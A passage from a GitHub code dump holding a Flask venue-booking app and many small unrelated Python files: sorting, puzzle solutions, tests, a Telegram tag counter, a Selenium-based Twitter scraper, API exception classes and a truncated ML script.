\"A\" should return \"Guns N Petals\", \"Matt Quevado\", and \"The Wild Sax Band\".\n # search for \"band\" should return \"The Wild Sax Band\".\n # done.\n response = {}\n search_term = request.form.get('search_term', '')\n artists = Artist.query.filter(Artist.name.ilike(\"%\" + search_term + \"%\")).all()\n data = []\n for artist in artists:\n data.append( {\"id\": artist.id, \n 'name': artist.name, \n 'num_upcoming_shows': len( db.session.query(Show).filter(Show.start_time > datetime.now(), Show.artist_id == artist.id).all() )} )\n response['count'] = len(data)\n response['data'] = data\n return render_template('pages/search_artists.html', results=response, search_term=search_term)\n\n@app.route('/artists/<int:artist_id>')\ndef show_artist(artist_id):\n # shows the artist page with the given artist_id\n # TODO: replace with real artist data from the artist table, using artist_id\n # done.\n data = {}\n artist = Artist.query.get(artist_id)\n genres = artist.genres.replace('{', '').replace('}', '').split(',')\n data = {\"id\": artist.id,\n \"name\": artist.name,\n \"genres\": genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"website\": artist.website_link,\n \"facebook_link\": artist.facebook_link,\n \"seeking_venue\": artist.seeking_venue,\n \"seeking_description\": artist.seeking_description,\n \"image_link\": artist.image_link,\n \"past_shows\": [],\n \"upcoming_shows\": [],\n \"past_shows_count\": 0,\n \"upcoming_shows_count\": 0,\n }\n \n # past shows\n past_shows_list = []\n past_shows_db = Show.query.filter(Show.start_time < datetime.now(), Show.artist_id == artist_id).all()\n for show in past_shows_db:\n venue = Venue.query.get(show.venue_id)\n past_shows_list.append( {'venue_id': show.venue_id, 'venue_name': venue.name, 'venue_image_link': venue.image_link ,'start_time': show.start_time} )\n # future shows\n future_shows_list = []\n future_shows_db = Show.query.filter(Show.start_time >= datetime.now(), Show.artist_id == artist_id).all()\n for show in future_shows_db:\n venue = Venue.query.get(show.venue_id)\n future_shows_list.append( {'venue_id': show.venue_id, 'venue_name': venue.name, 'venue_image_link': venue.image_link ,'start_time': show.start_time} )\n data['past_shows'] = past_shows_list\n data['upcoming_shows'] = future_shows_list\n data['past_shows_count'] = len(past_shows_list)\n data['upcoming_shows_count'] = len(future_shows_list)\n return render_template('pages/show_artist.html', artist=data)\n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists/<int:artist_id>/edit', methods=['GET'])\ndef edit_artist(artist_id):\n # TODO: populate form with fields from artist with ID <artist_id>\n # done.\n data = Artist.query.get(artist_id)\n artist={\n \"id\": data.id,\n \"name\": data.name,\n \"genres\": data.genres.replace('{', '').replace('}', '').split(','),\n \"city\": data.city,\n \"state\": data.state,\n \"phone\": data.phone,\n \"website\": data.website_link,\n \"facebook_link\": data.facebook_link,\n \"seeking_venue\": data.seeking_venue,\n \"seeking_description\": data.seeking_description,\n \"image_link\": data.image_link\n }\n form = ArtistForm(name=data.name,\n city=data.city,\n state=data.state,\n phone=data.phone,\n facebook_link=data.facebook_link,\n website_link=data.website_link,\n image_link=data.image_link,\n seeking_venue=data.seeking_venue,\n seeking_description=data.seeking_description)\n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists/<int:artist_id>/edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n # TODO: take values from the form submitted, and update existing\n # artist record with ID <artist_id> using the new attributes\n # done.\n try:\n artist = Artist.query.get(artist_id)\n artist.name = request.form['name']\n artist.city = request.form['city']\n artist.state = request.form['state']\n artist.phone = request.form['phone']\n artist.image_link = request.form['image_link']\n artist.facebook_link = request.form['facebook_link']\n artist.genres = request.form.getlist('genres')\n artist.website_link = request.form['website_link']\n artist.seeking_venue = request.form.get('seeking_venue') == 'y'\n artist.seeking_description = request.form['seeking_description']\n db.session.commit()\n # on successful db insert, flash success\n flash('Artist ' + str(artist_id) + ' was successfully updated!')\n except:\n db.session.rollback()\n flash('An error occurred. Artist ' + str(artist_id) + ' could not be updated.')\n finally:\n db.session.close()\n return redirect(url_for('show_artist', artist_id=artist_id))\n\n@app.route('/venues/<int:venue_id>/edit', methods=['GET'])\ndef edit_venue(venue_id):\n # TODO: populate form with values from venue with ID <venue_id>\n # done.\n data = Venue.query.get(venue_id)\n venue={\n \"id\": data.id,\n \"name\": data.name,\n \"genres\": data.genres.replace('{', '').replace('}', '').split(','),\n \"address\": data.address,\n \"city\": data.city,\n \"state\": data.state,\n \"phone\": data.phone,\n \"website\": data.website_link,\n \"facebook_link\": data.facebook_link,\n \"seeking_talent\": data.seeking_talent,\n \"seeking_description\": data.seeking_description,\n \"image_link\": data.image_link\n }\n form = VenueForm( name=data.name,\n city=data.city,\n state=data.state,\n address=data.address,\n phone=data.phone,\n facebook_link=data.facebook_link,\n website_link=data.website_link,\n image_link=data.image_link,\n seeking_talent=data.seeking_talent,\n seeking_description=data.seeking_description)\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@app.route('/venues/<int:venue_id>/edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n # TODO: take values from the form submitted, and update existing\n # venue record with ID <venue_id> using the new attributes\n # done.\n try:\n venue = Venue.query.get(venue_id)\n venue.name = request.form['name']\n venue.city = request.form['city']\n venue.state = request.form['state']\n venue.address = request.form['address']\n venue.phone = request.form['phone']\n venue.image_link = request.form['image_link']\n venue.facebook_link = request.form['facebook_link']\n venue.genres = request.form.getlist('genres')\n venue.website_link = request.form['website_link']\n venue.seeking_talent = request.form.get('seeking_talent') == 'y'\n venue.seeking_description = request.form['seeking_description']\n db.session.commit()\n # on successful db insert, flash success\n flash('Venue ' + str(venue_id) + ' was successfully updated!')\n except:\n db.session.rollback()\n flash('An error occurred. Venue ' + str(venue_id) + ' could not be updated.')\n finally:\n db.session.close()\n return redirect(url_for('show_venue', venue_id=venue_id))\n\n# Create Artist\n# ----------------------------------------------------------------\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n # called upon submitting the new artist listing form\n # TODO: insert form data as a new Artist record in the db, instead\n # TODO: modify data to be the data object returned from db insertion\n\n try:\n artist = Artist(name = request.form['name'],\n city = request.form['city'],\n state = request.form['state'],\n phone = request.form['phone'],\n image_link = request.form['image_link'],\n facebook_link = request.form['facebook_link'],\n genres = request.form.getlist('genres'),\n website_link = request.form['website_link'],\n seeking_venue = request.form.get('seeking_venue') == 'y',\n seeking_description = request.form['seeking_description'] )\n db.session.add(artist)\n db.session.commit()\n # on successful db insert, flash success\n flash('Artist ' + request.form['name'] + ' was successfully listed!')\n except:\n db.session.rollback()\n flash('An error occurred. 
Artist ' + request.form['name'] + ' could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@app.route('/shows')\ndef shows():\n # displays list of shows at /shows\n # TODO: replace with real venues data.\n # done.\n raw_shows = Show.query.all()\n data = []\n for show in raw_shows:\n artist = Artist.query.get(show.artist_id)\n venue = Venue.query.get(show.venue_id)\n data.append( {\"venue_id\": show.venue_id,\n \"venue_name\": venue.name,\n \"artist_id\": show.artist_id,\n \"artist_name\": artist.name,\n \"artist_image_link\": artist.image_link,\n \"start_time\": show.start_time} )\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # called to create new shows in the db, upon submitting new show listing form\n # TODO: insert form data as a new Show record in the db, instead\n # done.\n try:\n show = Show( artist_id = request.form['artist_id'], \n venue_id = request.form['venue_id'], \n start_time = request.form['start_time'] )\n db.session.add(show)\n db.session.commit() \n # on successful db insert, flash success\n flash('Show was successfully listed!')\n except:\n db.session.rollback()\n flash('An error occurred. Show could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","repo_name":"jinjin-liang/nd0044-project1-Fyyur","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":22381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
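One subtlety in the Show model above: `default=datetime.now()` calls the function once, at import time, so every row would share that stale timestamp. Passing the callable itself defers the call to each INSERT. A minimal sketch of the corrected column, reusing the file's `db` handle and `datetime` import; the class and table names here are hypothetical, purely for illustration:

class ShowFixed(db.Model):
    __tablename__ = 'shows_fixed'  # hypothetical name, just for the sketch
    id = db.Column(db.Integer, primary_key=True)
    # the callable is invoked per row, not once at class-definition time
    start_time = db.Column(db.DateTime, default=datetime.now, nullable=False)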
+{"seq_id":"70965189165","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 11 22:36:45 2018\n\n@author: Das\n\"\"\"\n\ndef Quicksort(arr, l, r):\n if l < r:\n pi = partition(arr, l, r)\n \n arr = Quicksort(arr, l, pi-1)\n arr = Quicksort(arr, pi+1, r)\n return arr\n \ndef partition(a, l, r):\n p = a[r]\n i = l-1\n \n for j in range(l, r):\n if a[j] <= p:\n i+=1\n a[i], a[j] = a[j], a[i]\n a[i+1], a[r] = a[r], a[i+1]\n return i+1\n \n\nprint('Enter numbers to sort separated by space:')\niput = input()\n\na = iput.split()\na = list(map(int, a))\na = Quicksort(a, 0, len(a)-1)\n\nprint(list(range(0, 6)))","repo_name":"dasaprakashk/100daysofcode","sub_path":"Divide and Conquer/Sorting/QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"19104980147","text":"f = open('day2-input.txt','r')\nlines = f.readlines()\nlines = [line.rstrip() for line in lines]\n\nsum = 0\nfor line in lines:\n line = list(line.split(' '))\n if(line[1] == 'Y'): \n sum += 3\n if(line[0] == 'A'): #Rock\n sum += 1\n elif(line[0] == 'B'): #Paper\n sum += 2\n else: #scissors\n sum += 3\n elif(line[1] == 'X'): \n sum += 0\n if(line[0] == 'A'): #Rock\n sum += 3\n elif(line[0] == 'B'): #Paper\n sum += 1\n else: #scissors\n sum += 2\n else: \n sum += 6\n if(line[0] == 'A'): #Rock\n sum += 2\n elif(line[0] == 'B'): #Paper\n sum += 3\n else: #scissors\n sum += 1\n\nprint(sum)\n\nf.close()","repo_name":"bergenmarshall/AdventOfCode2022","sub_path":"day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"2405774954","text":"from Carro import Carro\r\n\r\ncarro1 = Carro(\"Fiat\",\"Strada\",\"2020\",0)\r\n\r\ncarro1.ligar()\r\n\r\n# carro1.acelerar(int(input(\"Informe quanto deseja acelerar: \")))\r\n\r\n# if carro1.verificarMarcha() == False:\r\n# print(\"Baixar velocidade\")\r\n# else:\r\n# print(\"O carro está na \",carro1.verificarMarcha(), \"ª marcha\")\r\n\r\nif carro1.acelerar(int(input(\"Informe quanto deseja acelerar: \"))):\r\n print(\"Acelerou\")\r\nelse:\r\n print(\"Não acelerou\")\r\n ","repo_name":"leoncosta1980/AulasInfinity","sub_path":"Aula 12_06/mainCarro.py","file_name":"mainCarro.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"73197787244","text":"import asyncio\nimport csv\nimport logging\nimport re\nfrom datetime import datetime\nfrom pathlib import Path\n\nfrom telethon import TelegramClient # type: ignore\n\nfrom common import TAG_PATTERN, SESSION_NAME, SYSTEM_VERSION\n\n_log = logging.getLogger(__name__)\n\n\ndef get_tags(channel_name: str,\n api_id: int,\n api_hash: str,\n ):\n client = TelegramClient(SESSION_NAME, api_id, api_hash, system_version=SYSTEM_VERSION)\n client.start()\n\n tags: dict = {}\n\n async def main():\n channel = await client.get_entity(channel_name)\n messages = await client.get_messages(channel, limit=None)\n for msg in messages:\n if msg.text:\n _log.debug(msg.text)\n matches = re.findall(TAG_PATTERN, msg.text)\n for tag in matches:\n tags[tag] = tags.get(tag, 0) + 1\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n\n if not tags:\n _log.warning(\"No tags collected, csv will not be created\")\n return\n\n _log.debug(tags)\n write_csv(tags)\n\n\ndef write_csv(tags: dict):\n fieldnames = [\"Tag\", \"Amount\"]\n timestamp = datetime.now().strftime(\"%d_%m_%Y__%H_%M_%S\")\n here = Path(__file__).parents[2].resolve()\n output_folder = here / 'output' / 'tags'\n tags_file = output_folder / f\"{timestamp}_tags.csv\"\n output_folder.mkdir(exist_ok=True, parents=True)\n\n with open(tags_file, 'w', newline='') as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n for tag in tags:\n writer.writerow({fieldnames[0]: tag, fieldnames[1]: tags[tag]})\n","repo_name":"Cimeta/parser-example","sub_path":"src/parser/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"30017438594","text":"# -*- coding: utf-8 -*-\n\"\"\"\n##################################################\n#\n# ECP 3004: Python for Business Analytics\n#\n# Name: Songjie Yin\n#\n# Date: 5/3/2021\n# \n##################################################\n#\n# Sample Script for Final Exam: \n# Module with Function Definitions\n#\n##################################################\n\"\"\"\n\n\n\n\"\"\"\n##################################################\n##################################################\n# Note: there should be no printing or calculations\n# in this script, aside from function definitions. \n# Save those for a script that you might call\n# my_midterm_tests.py (but is not graded).\n##################################################\n##################################################\n\"\"\"\n\n\n\n\n\n\n##################################################\n# Import Required Modules\n##################################################\n\n# import name_of_module\nimport math\nimport numpy as np\nfrom scipy.optimize import minimize\n\n##################################################\n# Function Definitions\n##################################################\n\n# Only function definitions here - no other calculations. \n\n# Exercise 1\n\ndef ln_check(x: float, a: float) -> float:\n \"\"\"\n \n Calculates calculates the difference between math.log(x) \n\tand some candidate value a, which is a guess of the value of math.log(x).\n \n >>> ln_check(math.exp(7), 3)\n 4.0\n >>> ln_check(math.exp(9), 4.5)\n 4.5\n >>> ln_check(math.exp(10), 10)\n 0.0\n \n \"\"\"\n ln = math.log(x)\n \n check = ln - a\n \n return check\n\n# Exercise 2\n\ndef calc_e(x_0: float, max_iter: int, tol: float) -> float:\n \"\"\"\n Preconditions: x_0, iter, tol > 0\n \n Calculates the base of the natural logarithm.\n \n >>> calc_e(2, 10, 0.001)\n 2.718281064358138\n >>> calc_e(5,20, 0.001)\n 2.718281828458728\n >>> calc_e(1, 10, 0.1)\n 2.718281064358138\n \n \"\"\"\n x = x_0\n for i in range(max_iter):\n x_next = x-x*ln_check(x, 1)\n if abs(x_next-x) float:\n \"\"\"\n Calculates the sum of squared residuals \n for the linear regression model,\n as a function of the slope coefficient only, \n concentrating out the intercept.\n \n \n >>> SSR_conc(1.0, [3, -3, 3], [1, 1, 1])\n 24.0\n >>> SSR_conc(1.0, [3, 0, 3], [0, 2, 2])\n 12.666666666666666\n >>> SSR_conc(0.5, [2, 3, 4], [1, 2, 3])\n 0.5\n \n \"\"\"\n \n y_bar = sum(y)/len(y)\n x_bar = sum(x)/len(x)\n \n beta_0 = y_bar - (x_bar * beta_1)\n \n ssr = sum((np.array(y) - beta_0 - beta_1*np.array(x))**2)\n \n return ssr\n\n# Exercise 4\n\ndef ols_slope_conc(y: np.ndarray, x: np.ndarray) -> float:\n \"\"\"\n Calculates the estimated slope coefficient \n for the linear regression model,\n by minimizing the concentrated sum of squared resduals, \n which concentrates out the intercept.\n \n >>> ols_slope_conc([2, 1, 2], [1, 0, 1])\n 1.0\n >>> ols_slope_conc([3, 4, 5], [5, 4, 3])\n -1.00000001888464\n >>> ols_slope_conc([2, 1, 0], [1, 1, 0])\n 1.500000003725291\n \n \"\"\"\n \n initial_beta_1 = 1.0\n return minimize(SSR_conc, initial_beta_1, args=(y, x)).x[0]\n\n# Only function definitions above this point. \n\n\n##################################################\n# Test the examples in your docstrings\n##################################################\n\n\n# Question 2: Test using the doctest module. \n\n\n# Make sure to include exampes in your docstrings above\n# with the proper formatting. \n\n# Test all functions with three examples each. 
\n# One example is already provided. \n\n# Choose good examples that will test interesting cases. \n# Make sure they all work correctly. \n\n\n# Add code so that the tests are implemented below \n# -- but only when the script is run,\n# not when it is imported. \n\nimport doctest\n\nif __name__ == \"__main__\":\n\n doctest.testmod()\n\n\n\n##################################################\n# End\n##################################################\n\n","repo_name":"Kelvin0123/SongjieYin-ECP3004S21","sub_path":"final_exam/my_final_module.py","file_name":"my_final_module.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
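The update in calc_e, `x - x*ln_check(x, 1)`, is a Newton step for f(x) = ln(x) - 1: x_next = x - f(x)/f'(x) = x - x(ln x - 1) = x(2 - ln x), whose fixed point is e. A standalone check of that iteration:

import math

x = 2.0
for _ in range(6):
    x = x * (2 - math.log(x))  # Newton step for ln(x) = 1
print(abs(x - math.e) < 1e-12)  # True: quadratic convergence to e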
+{"seq_id":"30655579223","text":"import unittest\n\nfrom rca.programmes.utils import format_study_mode\n\n\nclass TestFormatStudyMode(unittest.TestCase):\n def test_common_last_word(self):\n study_modes = [\n \"Full-time study\",\n \"Part-time study\",\n ]\n result = format_study_mode(study_modes)\n self.assertEqual(result, \"Full-time or part-time study\")\n\n def test_different_last_word(self):\n study_modes_list = [\n [\n \"Study online\",\n \"Study on campus\",\n ],\n [\n \"Full-time\",\n \"Part-time\",\n ],\n ]\n result1 = format_study_mode(study_modes_list[0])\n self.assertEqual(result1, \"Study online or study on campus\")\n\n result2 = format_study_mode(study_modes_list[1])\n self.assertEqual(result2, \"Full-time or part-time\")\n\n def test_custom_separator(self):\n study_modes = [\n \"Option A\",\n \"Option B\",\n \"Option C\",\n ]\n result = format_study_mode(study_modes, separator=\" / \")\n self.assertEqual(result, \"Option a / option b / option c\")\n","repo_name":"torchbox/rca-wagtail-2019","sub_path":"rca/programmes/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"}
+{"seq_id":"74083843882","text":"from panda3d.core import Vec4, Point3\n\nELEVATOR_NORMAL = 0\nELEVATOR_INT = 1\nREJECT_NOREASON = 0\nREJECT_SHUFFLE = 1\nREJECT_NOSEAT = 2\nMAX_GROUP_BOARDING_TIME = 6.0\n\nElevatorData = {ELEVATOR_NORMAL: {'openTime': 2.0,\n 'closeTime': 2.0,\n 'width': 3.5,\n 'countdown': 15.0,\n 'sfxVolume': 1.0,\n 'collRadius': 5},\n ELEVATOR_INT: {'openTime': 2.0,\n 'closeTime': 2.0,\n 'width': 3.5,\n 'countdown': 65.0,\n 'sfxVolume': 1.0,\n 'collRadius': 5}}\n\nTOON_BOARD_ELEVATOR_TIME = 1.0\nTOON_EXIT_ELEVATOR_TIME = 1.0\nTOON_VICTORY_EXIT_TIME = 1.0\nSUIT_HOLD_ELEVATOR_TIME = 1.0\nSUIT_LEAVE_ELEVATOR_TIME = 2.0\nINTERIOR_ELEVATOR_COUNTDOWN_TIME = 90\nLIGHT_OFF_COLOR = Vec4(0.5, 0.5, 0.5, 1.0)\nLIGHT_ON_COLOR = Vec4(1.0, 1.0, 1.0, 1.0)\n\nElevatorPoints = [Point3(-1.5, 5, 0.1), Point3(1.5, 5, 0.1),\n Point3(-2.5, 3, 0.1), Point3(2.5, 3, 0.1)]\n\nElevatorOutPoints = [Point3(-1.5, -5, 0), Point3(1.5, -5, 0),\n Point3(-2.5, -7, 0), Point3(2.5, -7, 0)]\n\nElevatorOutPointsFar = [Point3(-1.5, -5, 0), Point3(1.5, -5, 0),\n Point3(-2.5, -7, 0), Point3(2.5, -7, 0)]\n","repo_name":"Cog-Invasion-Online/cio-src","sub_path":"game/src/coginvasion/cogoffice/ElevatorConstants.py","file_name":"ElevatorConstants.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"19"}
+{"seq_id":"14331276561","text":"class Solution:\n def addBinary(self, a: str, b: str) -> str:\n i = -1\n total = \"\"\n carry = 0\n diff = len(a) - len(b)\n\n if diff > 0:\n b = diff * \"0\" + b\n elif diff < 0:\n a = abs(diff) * \"0\" + a\n\n while abs(i) <= len(a):\n if int(a[i]) + int(b[i]) + carry < 2:\n total = str(int(a[i]) + int(b[i]) + carry) + total\n carry = 0\n elif int(a[i]) + int(b[i]) + carry == 2:\n carry = 1\n total = \"0\" + total\n else:\n carry = 1\n total = \"1\" + total\n i -= 1\n\n if carry:\n total.replace(total[0], \"0\")\n total = \"1\" + total\n\n return total\n","repo_name":"ocan00cemal/LeetCode","sub_path":"67. Add Binary.py","file_name":"67. Add Binary.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"1676480912","text":"import unittest\nfrom selenium import webdriver\nimport xlutils\nfrom xlutilis import ReadData\nfrom selenium.webdriver.common.keys import Keys\nclass Test_001(unittest.TestCase):\n @classmethod\n def setUp(self):\n self.driver=webdriver.Chrome(executable_path=\"C:\\\\Users\\\\DELL\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python37\\\\chromedriver.exe\")\n @classmethod\n def tearDown(self):\n self.driver.close()\n\n def test_login_facebook(self):\n self.driver.get(\"https://www.facebook.com/login/\")\n self.driver.find_element_by_xpath(\"//*[@id='email']\").send_keys(\"mskmouni@gmail.com\")\n self.driver.find_element_by_xpath(\"//*[@id='pass']\").send_keys(\"cdsdcdsd\")\n self.driver.find_element_by_xpath(\"//*[@id='loginbutton']\").click()\n title_fb=self.driver.title\n self.assertEqual(\"test_login_facebook\",title_fb,\"title of the page is unmatched\")\n @unittest.skip(\"this is the test not ready yet\")\n def test_redbus(self):\n self.driver.get(\"https://www.redbus.in/\")\n print(self.driver.title)\n @unittest.SkipTest\n def test_opencart(self):\n self.driver.get(\"https://www.opencart.com/\")\n return self.driver.title\n\nif \"__name__\" == \"__main__\":\n unittest.main\n","repo_name":"surmetta143/pythonProject","sub_path":"Test_unit.py","file_name":"Test_unit.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"37749171168","text":"import calendar\nimport datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\n\ndef getXpath(browser,tweet):\n # use JavaScript execute the code getting XPath\n xpath = browser.execute_script(\"\"\"\n function absoluteXPath(element) {\n var comp, comps = [];\n var parent = null;\n var xpath = '';\n var getPos = function(element) {\n var position = 1, curNode;\n if (element.nodeType == Node.ATTRIBUTE_NODE) {\n return null;\n }\n for (curNode = element.previousSibling; curNode; curNode = curNode.previousSibling) {\n if (curNode.nodeName == element.nodeName) {\n ++position;\n }\n }\n return position;\n };\n while (element) {\n comp = comps[comps.length] = {};\n switch (element.nodeType) {\n case Node.TEXT_NODE:\n comp.name = 'text()';\n break;\n case Node.ATTRIBUTE_NODE:\n comp.name = '@' + element.nodeName;\n break;\n default:\n comp.name = element.nodeName;\n }\n comp.position = getPos(element);\n element = element.parentNode;\n }\n for (var i = comps.length - 1; i >= 0; i--) {\n comp = comps[i];\n xpath += '/' + comp.name;\n if (comp.position !== null) {\n xpath += '[' + comp.position + ']';\n }\n }\n return xpath;\n }\n return absoluteXPath(arguments[0]);\n \"\"\", tweet)\n return xpath\n\ndef splitTime(sinceTime,untilTime):\n #split untilTime-sinceTime by month\n dates = []\n for year in range(sinceTime.year, untilTime.year + 1):\n for month in range(1, 13):\n first_day = datetime.datetime(year, month, 1)\n last_day = calendar.monthrange(year, month)[1]\n dates.append(first_day)\n dates.append(datetime.datetime(year, month, last_day))\n s = dates[0::2]\n e = dates[1::2]\n sinceList = [str(date).split()[0] for date in s]\n untilList = [str(date).split()[0] for date in e]\n return sinceList,untilList\n\ndef scrap(browser,advSearchComand):\n key='[data-testid=\"tweetText\"]'#locating the tweets\n wait = WebDriverWait(browser, 10)\n browser.get(advSearchComand)\n WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, key)))\n collect=[]\n tweets = wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, key)))\n while tweets:\n for tweet in tweets:\n if len(getXpath(browser,tweet))>=210:#过滤被转发微博,被转发微博xpath更长\n continue\n collect.append(tweet.text)\n browser.execute_script(\"arguments[0].scrollIntoView({ behavior: 'auto', block: 'start' });\", tweet)#跳转到最后一条贴文\n time.sleep(5)\n tempTweets = wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, key)))\n tweets=tempTweets[tempTweets.index(tweet)+1:]\n return collect","repo_name":"Jing-XING/TweetCrawler","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71846888684","text":"from typing import Dict, List, Any\nfrom requests import HTTPError, Response\nfrom urllib.parse import urlparse, parse_qs\nfrom functools import reduce\n\n\nclass CoinMetricsUnauthorizedException(HTTPError):\n \"\"\"\n Raised when a request is made that will return an error due to being unauthorized to flat files server\n \"\"\"\n\n def __init__(self, response: Response, *args: Any, **kwargs: Any):\n if response.status_code not in [401, 403]:\n response.raise_for_status()\n self.response = response\n self.request = response.request\n error_message = \"\"\"The provided API key is not authorized to access the Coin Metrics Flat Files server. This product is separate from the API. If you'd like access granted or believe this is a mistake please contact Coin Metrics support.\n \"\"\"\n self.msg = error_message\n super().__init__(response=response, request=response.request, *args, **kwargs)\n\n def __str__(self) -> str:\n return self.msg\n\n\nclass CoinMetricsClientQueryParamsException(HTTPError):\n \"\"\"\n Raised when a request is made that will return an error due to the logic or contents of the request\n \"\"\"\n\n def __init__(self, response: Response, *args: Any, **kwargs: Any):\n if response.status_code != 414:\n response.raise_for_status()\n parsed_query_params: Dict[str, List[str]] = parse_qs(\n str(urlparse(url=response.request.url).query)\n )\n get_sum_of_lengths = lambda strings: reduce(lambda a, b: a + len(b), strings, 0)\n param_length_dict = {\"Total characters\": 0}\n for param, values in parsed_query_params.items():\n sum_of_param_lengths = get_sum_of_lengths(values)\n param_length_dict[param] = sum_of_param_lengths\n param_length_dict[\"Total characters\"] += sum_of_param_lengths\n exception_message = (\n \"This request failed because the request URL is too long, consider reducing the length \"\n f\"of the params.\\n 414 errors may get returned as total characters in query params exceed 5000\"\n f\"\\nLength of the params provided for reference:\\n {param_length_dict}\"\n )\n self.msg = exception_message\n super().__init__(*args, **kwargs)\n\n def __str__(self) -> str:\n return self.msg\n","repo_name":"coinmetrics/api-client-python","sub_path":"coinmetrics/_exceptions.py","file_name":"_exceptions.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"19"}
+{"seq_id":"70217545644","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 6 10:29:46 2018\r\n\r\n@author: YUBO\r\n\"\"\"\r\nimport pandas as pd\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy as sp\r\nimport sklearn\r\nfrom pandas import Series,DataFrame\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier,AdaBoostClassifier,GradientBoostingClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom mlxtend.classifier import StackingCVClassifier\r\nfrom collections import Counter\r\nfrom sklearn.decomposition import PCA\r\nnp.random.seed(0)\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.model_selection import GridSearchCV\r\n#读取测试集\r\ntest_data=pd.read_csv(\"all_test.csv\",header=None)\r\ntest_data=test_data.iloc[0:99998,:]\r\nerror=pd.read_csv(\"error.csv\",header=None)\r\ntest_data=test_data.append(error,ignore_index=True)\r\ntest_data1=test_data.iloc[:,1:]\r\ntest_data1.columns=list(np.arange(2600))\r\n\r\n\r\ndata_train=pd.read_csv(\"partTrainData.csv\",header=None)\r\nmix_data=data_train.iloc[:,0:2600].append(test_data1,ignore_index=True)\r\nmix_data=DataFrame(mix_data)\r\nscale = StandardScaler()\r\nx = scale.fit_transform(mix_data)#数据标准化\r\nx=DataFrame(x)\r\npca = 